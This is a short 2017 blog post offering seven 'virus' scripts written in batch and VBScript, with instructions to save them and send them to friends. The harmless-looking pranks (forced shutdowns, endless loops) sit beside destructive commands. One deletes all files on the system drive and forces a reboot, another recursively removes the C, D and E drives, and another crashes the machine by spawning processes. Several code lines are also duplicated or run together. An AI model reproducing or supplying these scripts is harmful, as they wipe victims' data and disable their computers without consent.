Create Basic Viruses Using Notepad

July 06, 2017

Create Viruses By Your Own!!!!



Following Are Different Tricks for creating viruses on Notepad.

note: write all the code/copy paste all the code on notepad


1.Crash your friends Computer

Option Explicit

Dim WSHShell

Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x

For x = 1 to 100000000

WSHShell.Run "Tourstart.exe"

Next

save this file as anything.vbs and send it to your friend.


2.Convey your friend a little message and shut down his / her computer:

@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s

@echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s

save this file as anything.bat extension

3.Frustrate your friend by making this VBScript hit Backspace simultaneously: Type :

MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100 wshshell.sendkeys "{bs}"

loop

save this file as anything.vbs



4.This Virus Deletes All The Content Of A Drive...

@echo off

del %systemdrive%*.* /f /s /q

shutdown -r -f -t 00

@echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00

save this file as anything.bat



5.This Will Crash Ur Computer

Option Explicit

Dim WSHShell

Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x

For x = 1 to 100000000

WSHShell.Run "Tourstart.exe"

Next

save this file as anything.vbs .



6.This virus Formats the C ,D , and E Drive in 3 Seconds.

Copy the below command there

"rd/s/q D:\

rd/s/q C:\

rd/s/q E:\" ( without quotes )

save this files as anything.bat extension.



7.Open Notepad continually in your friend's computer:

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

save this file as anything.bat .



Shine like a Sunshine


No comments:

Powered by Blogger.